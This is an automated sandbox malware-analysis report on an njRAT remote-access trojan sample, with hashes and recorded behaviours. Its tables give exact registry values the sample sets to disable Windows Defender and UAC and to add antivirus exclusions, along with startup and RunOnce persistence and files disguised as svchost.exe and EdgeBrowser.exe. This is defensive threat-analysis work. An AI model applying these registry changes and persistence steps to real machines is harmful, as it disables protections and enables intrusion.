Malware Analysis Report

2025-08-10 21:18

Sample ID 240127-ghd2rseeb2
Target 796ed4b0db9b3d50149b39c35c97fb22
SHA256 37db478cd1a50883e179c601987b3a5171823aaa9d04063817fa7af57723ffb7
Tags
njrat client evasion persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

37db478cd1a50883e179c601987b3a5171823aaa9d04063817fa7af57723ffb7

Threat Level: Known bad

The file 796ed4b0db9b3d50149b39c35c97fb22 was found to be: Known bad.

Malicious Activity Summary

njrat client evasion persistence trojan

Turns off Windows Defender SpyNet reporting

njRAT/Bladabindi

Modifies Windows Defender Real-time Protection settings

UAC bypass

Windows security bypass

Nirsoft

Stops running service(s)

Loads dropped DLL

Checks computer location settings

Windows security modification

Executes dropped EXE

Drops startup file

Adds Run key to start application

Checks whether UAC is enabled

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Program Files directory

Drops file in Windows directory

Program crash

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

System policy modification

Delays execution with timeout.exe

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-01-27 05:48

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-01-27 05:47

Reported

2024-01-27 05:50

Platform

win10v2004-20231215-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A

Turns off Windows Defender SpyNet reporting

evasion

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\EdgeBrowser.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\EdgeBrowser.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\EdgeBrowser.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\EdgeBrowser.exe = "0" C:\Windows\EdgeBrowser.exe N/A

njRAT/Bladabindi

trojan njrat

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation C:\Windows\EdgeBrowser.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation C:\Windows\EdgeBrowser.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation C:\Windows\EdgeBrowser.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\EdgeBrowser.exe = "0" C:\Windows\EdgeBrowser.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7 = "C:\\Program Files\\Common Files\\System\\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\\svchost.exe" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7 = "C:\\Program Files\\Common Files\\System\\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\\svchost.exe" C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7 = "C:\\Program Files\\Common Files\\System\\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\\svchost.exe" C:\Windows\EdgeBrowser.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7 = "C:\\Program Files\\Common Files\\System\\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\\svchost.exe" C:\Windows\EdgeBrowser.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7 = "C:\\Program Files\\Common Files\\System\\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\\svchost.exe" C:\Windows\EdgeBrowser.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\EdgeBrowser.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\EdgeBrowser.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\EdgeBrowser.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Windows\EdgeBrowser.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Windows\EdgeBrowser.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Windows\EdgeBrowser.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
N/A N/A C:\Windows\EdgeBrowser.exe N/A
N/A N/A C:\Windows\EdgeBrowser.exe N/A
N/A N/A C:\Windows\EdgeBrowser.exe N/A
N/A N/A C:\Windows\EdgeBrowser.exe N/A
N/A N/A C:\Windows\EdgeBrowser.exe N/A
N/A N/A C:\Windows\EdgeBrowser.exe N/A
N/A N/A C:\Windows\EdgeBrowser.exe N/A
N/A N/A C:\Windows\EdgeBrowser.exe N/A
N/A N/A C:\Windows\EdgeBrowser.exe N/A
N/A N/A C:\Windows\EdgeBrowser.exe N/A
N/A N/A C:\Windows\EdgeBrowser.exe N/A
N/A N/A C:\Windows\EdgeBrowser.exe N/A
N/A N/A C:\Windows\EdgeBrowser.exe N/A
N/A N/A C:\Windows\EdgeBrowser.exe N/A
N/A N/A C:\Windows\EdgeBrowser.exe N/A
N/A N/A C:\Windows\EdgeBrowser.exe N/A
N/A N/A C:\Windows\EdgeBrowser.exe N/A
N/A N/A C:\Windows\EdgeBrowser.exe N/A
N/A N/A C:\Windows\EdgeBrowser.exe N/A
N/A N/A C:\Windows\EdgeBrowser.exe N/A
N/A N/A C:\Windows\EdgeBrowser.exe N/A
N/A N/A C:\Windows\EdgeBrowser.exe N/A
N/A N/A C:\Windows\EdgeBrowser.exe N/A
N/A N/A C:\Windows\EdgeBrowser.exe N/A
N/A N/A C:\Windows\EdgeBrowser.exe N/A
N/A N/A C:\Windows\EdgeBrowser.exe N/A
N/A N/A C:\Windows\EdgeBrowser.exe N/A
N/A N/A C:\Windows\EdgeBrowser.exe N/A
N/A N/A C:\Windows\EdgeBrowser.exe N/A
N/A N/A C:\Windows\EdgeBrowser.exe N/A
N/A N/A C:\Windows\EdgeBrowser.exe N/A
N/A N/A C:\Windows\EdgeBrowser.exe N/A
N/A N/A C:\Windows\EdgeBrowser.exe N/A
N/A N/A C:\Windows\EdgeBrowser.exe N/A
N/A N/A C:\Windows\EdgeBrowser.exe N/A
N/A N/A C:\Windows\EdgeBrowser.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\EdgeBrowser.exe C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
File opened for modification C:\Windows\EdgeBrowser.exe C:\Windows\EdgeBrowser.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a8d1037-c218-4468-b049-38d039afce41\AdvancedRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a8d1037-c218-4468-b049-38d039afce41\AdvancedRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a8d1037-c218-4468-b049-38d039afce41\AdvancedRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a8d1037-c218-4468-b049-38d039afce41\AdvancedRun.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
